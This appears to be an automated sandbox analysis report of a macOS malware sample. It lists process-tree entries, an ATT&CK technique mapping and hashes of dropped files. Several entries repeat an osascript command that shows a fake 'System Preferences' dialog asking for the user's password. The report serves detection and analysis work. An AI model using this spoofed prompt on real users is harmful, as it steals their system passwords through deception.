sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:683

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:683

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:683

/bin/sh
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:684

/bin/bash
sh -c "osascript -e 'display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer'"
1⤵
PID:684

/usr/bin/osascript
osascript -e "display dialog \"To launch the application, you need to update the system settings You entered an invalid password.\\n\\nPlease enter your password.\" with title \"System Preferences\" with icon caution default answer \"\" giving up after 30 with hidden answer"
1⤵
PID:684

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

AppleScript

T1059.002

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Resource Forking

T1564.009

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

/Users/run/Library/Caches/GeoServices/ActiveTileGroup.pbd
Filesize
124KB

MD5
c874191d6475c39e409e740be755ea70

SHA1
7aa2b06bc13ed7514f92a273c1846b84f0660969

SHA256
325d44cb69f353c0b427363ed504941a3c9e29ed66188338742518b95ceb3ac3

SHA512
f0e6150804ba7946e4c6144ec9649164559b454e85807b90358eb1bdc5e79ea48fc558c20b2d7501e81cd482bd4edd2362250ec963a180691173b17aa6408ff3

Download Submit
/Users/run/Library/Caches/GeoServices/Experiments.pbd
Filesize
137B

MD5
5e8632d6b49883e3418e8c40a2e256da

SHA1
7df15079eb6ce1d8bad585a0a2cabce27981d2b9

SHA256
d57ac4c8830f417846c731303f30bb948527396f1d0e7345932a13abd09085f7

SHA512
a3f7a8f067a8a8ebd757d0c524279d1c154b4ece6bb96a88d6ca9650a461fc45f8e0ac4d3ae2fd05df163666d3cfa3d2a46e2b6aaedcf1f607faae4f32a98bf7

Download Submit
/dev/ttys000
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C/assistantd//mds/mdsDirectory.db
Filesize
47KB

MD5
0e4a0d1ceb2af6f0f8d0167ce77be2d3

SHA1
414ba4c1dc5fc8bf53d550e296fd6f5ad669918c

SHA256
cca093bcfc65e25dd77c849866e110df72526dffbe29d76e11e29c7d888a4030

SHA512
1dc5282d27c49a4b6f921ba5dfc88b8c1d32289df00dd866f9ac6669a5a8d99afeda614bffc7cf61a44375ae73e09cd52606b443b63636977c9cd2ef4fa68a20

Download Submit
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C/assistantd//mds/mdsObject.db
Filesize
4KB

MD5
d3a1859e6ec593505cc882e6def48fc8

SHA1
f8e6728e3e9de477a75706faa95cead9ce13cb32

SHA256
3ebafa97782204a4a1d75cfec22e15fcdeab45b65bab3b3e65508707e034a16c

SHA512
ea2a749b105759ea33408186b417359deffb4a3a5ed0533cb26b459c16bb3524d67ede5c9cf0d5098921c0c0a9313fb9c2672f1e5ba48810eda548fa3209e818

Download Submit
/var/folders/pq/yy2b5ptn4cz739jgclj4m1wm0000gp/C/com.apple.colorsync.profiles.502
Filesize
21KB

MD5
fec1cb0c69238751e92016e079061483

SHA1
02e76e99ad121edf1cd299c3fada1dd6ee6ae53e

SHA256
4301861ca21cdbf075880f0a7ae3dd7d21a6fddbaf2fb5f1c7b9a2fd62b9a9ee

SHA512
c752a3c825bd9fc41081478df66a992a4147c941b52fa7df59689246f3cef4ab252a6f0b9ff45c030d92236923ddad3dfffaf9b1be5142cc8353bc9bbb24f242

Download Submit
/var/root/Library/Saved Application State/com.apple.osascript.savedState/data.data
Filesize
1KB

MD5
f455d53fcc808fce2cb3c41bb83afbfc

SHA1
c754df11fc235d4da9d5e449e2a94925457bfa93

SHA256
2f8dc593341e3238830b37978c2c9e9488ef3d427be9239488e542d44028e303

SHA512
fc17afa229a98c4bfbc99736bb91768de867991c7babb8d484d36403a761a0f2346fe47d481f673fde09b2a7b45439cccf194d3f550ce241c1ac9c7be75cc9fe

Download Submit
/var/root/Library/Saved Application State/com.apple.osascript.savedState/data.data
Filesize
2KB

MD5
8c61434b32ece5a17cb2b3f8d9427bd5

SHA1
9b6de2e8649ca57a44bf8a0ab131243353027e55

SHA256
a81b2fd6c6cf241f30c1d495388b0fd9c249dd593cbc9eb149bf154cc86e75af

SHA512
d800e8c14a36bf6ffdcb2889591f2db0ea6494a6366d3093eb8695e31ba51391a01db06b5ded9fb29ada97df47d0d43d6d798987abb7106879d3126d33ee2059

Download Submit
/var/root/Library/Saved Application State/com.apple.osascript.savedState/data.data
Filesize
3KB

MD5
a65f7af86cab1230ca716531dd2c27eb

SHA1
3756ec75ed423bdce51d68bfb117a5b63031850f

SHA256
dacb80e0d29e74fc34cef10c4fa51654f2e3db0ba0af1db87660f86e8ebc1f3f

SHA512
adabd54e4f3162ed18c6694da09d28c2b945f5460f169be159538d998b709cf714caa8c7d944841b18c309db685f3ff46604b84f7a8d4fcb3d30d084a4536f4c

Download Submit
/var/root/Library/Saved Application State/com.apple.osascript.savedState/data.data
Filesize
2KB

MD5
204fe93aeee5b5c1b54ef706062004f3

SHA1
ef1f7d84fef2396c3302f300af22dddfab7bb800

SHA256
86dc112e0fea9fc7d7f9614a1352a6e5b7c30247ee991e03849877e95a21cfd4

SHA512
ce83d56c2c1eeeae1e8a217f17b47f069675dc8ac166216b58cf87cf2f774895a6707ca4d63fa8f7c6dbadaeefa12761340b1397efcfa851d7ad681319aab42f

Download Submit
/var/root/Library/Saved Application State/com.apple.osascript.savedState/data.data
Filesize
1KB

MD5
7af33c32f4082853c209ee8b652cf9f1

SHA1
a74de93685e1cb6e58a02b48f162f7afedabe38c

SHA256
dc9cf1df083d981b971cd9bdf8d4971ff04815c1c5b98ca90f8a54defdfc4bcc

SHA512
67c3b0e53fe41e39f5d87995c8f82fe2d9f358d97dce3df5aa27da68c77804d15bac5832d62daac295bbd6d5d2cf24df93393d97e9f83c980034548df57fe52b

Download Submit
/var/root/Library/Saved Application State/com.apple.osascript.savedState/data.data
Filesize
1KB

MD5
0e6ac02fd0cce484f90d0d0213deb341

SHA1
7496c6b2b715fe4ea00cca793c94cb527b261ba5

SHA256
e2b97855323e914eb1bbe3c7fb313e6c1c8d07f906ca167eded75b0e4b473a7d

SHA512
bf57cdb4e0a26d21cccb6716d40e4f80d89d8bf473be0c19f0ede31c598114025a3e97c7e24d2ab4fec24bdc15c7423cc423b043e8cef86d3f95fdabac464472

Download Submit
/var/root/Library/Saved Application State/com.apple.osascript.savedState/data.data
Filesize
1KB

MD5
71a00d0ee7a443c62cd5d2598c2b5a4e

SHA1
3e4e0e3b6d55aa1b976d609a5e3a353a9f18610a

SHA256
46999e7f812438bbb46f771df159f9326f8b8a78ef8d4cba119dd6a5ef4f9972

SHA512
f512716edd95cc900a32fb209cc63266a829fb52561ea6718c5fb1c79df11455fcf7262f2d6a8cd76bbebf894a990de19feba646d7b89d47c17f6be330a518b0

Download Submit